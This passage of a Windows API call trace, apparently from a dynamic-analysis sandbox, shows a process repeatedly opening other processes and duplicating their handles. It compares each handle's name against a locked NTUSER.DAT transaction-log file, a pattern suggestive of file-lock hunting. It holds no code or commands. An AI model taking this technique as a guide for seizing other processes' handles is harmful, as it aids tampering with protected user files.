dwMilliseconds=0xfa) returned 0x0 [0162.929] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.930] CloseHandle (hObject=0x1e4) returned 1 [0162.930] _wcsicmp (_Str1="\\catdb", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -11 [0162.930] CloseHandle (hObject=0x194) returned 1 [0162.930] CloseHandle (hObject=0x1e8) returned 1 [0162.930] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x1e8 [0162.930] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x5dc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.930] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.930] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.931] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.931] CloseHandle (hObject=0x1e4) returned 1 [0162.931] _wcsicmp (_Str1="\\catdb", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -11 [0162.931] CloseHandle (hObject=0x194) returned 1 [0162.932] CloseHandle (hObject=0x1e8) returned 1 [0162.932] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x444) returned 0x1e8 [0162.932] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.932] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.932] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.933] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.934] CloseHandle (hObject=0x1e4) returned 1 [0162.934] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 5 [0162.934] CloseHandle (hObject=0x194) returned 1 [0162.934] CloseHandle (hObject=0x1e8) returned 1 [0162.934] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0162.934] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.934] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.934] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.935] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.935] CloseHandle (hObject=0x1e4) returned 1 [0162.935] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 5 [0162.935] CloseHandle (hObject=0x194) returned 1 [0162.935] CloseHandle (hObject=0x1e8) returned 1 [0162.935] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0162.935] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.935] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.936] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.937] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.937] CloseHandle (hObject=0x1e4) returned 1 [0162.937] _wcsicmp (_Str1="\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_2b24536c71ed437a", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -13 [0162.937] CloseHandle (hObject=0x194) returned 1 [0162.937] CloseHandle (hObject=0x1e8) returned 1 [0162.937] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0162.937] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x13c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.937] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.938] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.939] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.939] CloseHandle (hObject=0x1e4) returned 1 [0162.939] CloseHandle (hObject=0x194) returned 1 [0162.939] CloseHandle (hObject=0x1e8) returned 1 [0162.939] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0162.939] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x144, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.939] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.940] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.940] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.941] CloseHandle (hObject=0x1e4) returned 1 [0162.941] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -13 [0162.941] CloseHandle (hObject=0x194) returned 1 [0162.941] CloseHandle (hObject=0x1e8) returned 1 [0162.941] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0162.941] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x16c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.941] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.941] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.942] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.943] CloseHandle (hObject=0x1e4) returned 1 [0162.943] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -13 [0162.943] CloseHandle (hObject=0x194) returned 1 [0162.943] CloseHandle (hObject=0x1e8) returned 1 [0162.943] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0162.943] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x174, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.943] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.944] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.945] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.945] CloseHandle (hObject=0x1e4) returned 1 [0162.945] _wcsicmp (_Str1="\\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_08e61857a83bc251", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -13 [0162.945] CloseHandle (hObject=0x194) returned 1 [0162.945] CloseHandle (hObject=0x1e8) returned 1 [0162.945] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0162.945] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x178, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.945] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.946] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.946] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.946] CloseHandle (hObject=0x1e4) returned 1 [0162.946] _wcsicmp (_Str1="\\amd64_microsoft.vc90.atl_1fc8b3b9a1e18e3b_9.0.30729.6161_none_0a1fd3a3a768b895", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -13 [0162.947] CloseHandle (hObject=0x194) returned 1 [0162.947] CloseHandle (hObject=0x1e8) returned 1 [0162.947] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0162.947] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x18c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.947] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.948] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.948] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.948] CloseHandle (hObject=0x1e4) returned 1 [0162.949] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -13 [0162.949] CloseHandle (hObject=0x194) returned 1 [0162.949] CloseHandle (hObject=0x1e8) returned 1 [0162.949] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0162.949] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.949] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.950] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.951] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.951] CloseHandle (hObject=0x1e4) returned 1 [0162.951] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -13 [0162.951] CloseHandle (hObject=0x194) returned 1 [0162.951] CloseHandle (hObject=0x1e8) returned 1 [0162.951] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0162.951] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x20c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.951] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.952] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.952] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.952] CloseHandle (hObject=0x1e4) returned 1 [0162.952] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -13 [0162.952] CloseHandle (hObject=0x194) returned 1 [0162.953] CloseHandle (hObject=0x1e8) returned 1 [0162.953] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0162.953] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x278, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.953] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.953] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.954] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.954] CloseHandle (hObject=0x1e4) returned 1 [0162.954] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -13 [0162.954] CloseHandle (hObject=0x194) returned 1 [0162.954] CloseHandle (hObject=0x1e8) returned 1 [0162.954] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0162.954] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x298, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.954] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.955] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.956] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.956] CloseHandle (hObject=0x1e4) returned 1 [0162.956] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -13 [0162.956] CloseHandle (hObject=0x194) returned 1 [0162.956] CloseHandle (hObject=0x1e8) returned 1 [0162.956] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0162.956] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x2c0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.956] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.957] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.957] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.957] CloseHandle (hObject=0x1e4) returned 1 [0162.957] _wcsicmp (_Str1="\\StaticCache.dat", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 5 [0162.957] CloseHandle (hObject=0x194) returned 1 [0162.958] CloseHandle (hObject=0x1e8) returned 1 [0162.958] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0162.958] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x2d0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.958] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.958] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.959] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.959] CloseHandle (hObject=0x1e4) returned 1 [0162.959] _wcsicmp (_Str1="\\amd64_microsoft.windows.c..-controls.resources_6595b64144ccf1df_6.0.7600.16385_en-us_106f9be843a9b4e3", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -13 [0162.959] CloseHandle (hObject=0x194) returned 1 [0162.960] CloseHandle (hObject=0x1e8) returned 1 [0162.960] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0162.960] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x2d4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.960] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.960] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.961] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.961] CloseHandle (hObject=0x1e4) returned 1 [0162.961] _wcsicmp (_Str1="\\comctl32.dll.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -11 [0162.961] CloseHandle (hObject=0x194) returned 1 [0162.962] CloseHandle (hObject=0x1e8) returned 1 [0162.962] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0162.962] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x2e0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.962] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.962] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.963] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.963] CloseHandle (hObject=0x1e4) returned 1 [0162.963] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -13 [0162.963] CloseHandle (hObject=0x194) returned 1 [0162.963] CloseHandle (hObject=0x1e8) returned 1 [0162.963] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0162.963] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x36c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.963] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.964] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.965] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.965] CloseHandle (hObject=0x1e4) returned 1 [0162.965] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -13 [0162.965] CloseHandle (hObject=0x194) returned 1 [0162.965] CloseHandle (hObject=0x1e8) returned 1 [0162.965] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0162.965] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x394, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.965] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.966] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.967] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.967] CloseHandle (hObject=0x1e4) returned 1 [0162.967] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -13 [0162.967] CloseHandle (hObject=0x194) returned 1 [0162.967] CloseHandle (hObject=0x1e8) returned 1 [0162.967] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0162.967] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x404, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.967] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.968] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.969] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.969] CloseHandle (hObject=0x1e4) returned 1 [0162.969] _wcsicmp (_Str1="\\User Pinned", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 7 [0162.969] CloseHandle (hObject=0x194) returned 1 [0162.969] CloseHandle (hObject=0x1e8) returned 1 [0162.969] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0162.969] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x408, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.969] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.970] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.970] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.971] CloseHandle (hObject=0x1e4) returned 1 [0162.971] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -13 [0162.971] CloseHandle (hObject=0x194) returned 1 [0162.971] CloseHandle (hObject=0x1e8) returned 1 [0162.971] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0162.971] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x44c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.971] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.972] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.972] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.972] CloseHandle (hObject=0x1e4) returned 1 [0162.973] _wcsicmp (_Str1="\\Libraries", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -2 [0162.973] CloseHandle (hObject=0x194) returned 1 [0162.973] CloseHandle (hObject=0x1e8) returned 1 [0162.973] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0162.973] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x458, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.973] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.974] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.975] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.975] CloseHandle (hObject=0x1e4) returned 1 [0162.975] _wcsicmp (_Str1="\\Libraries", 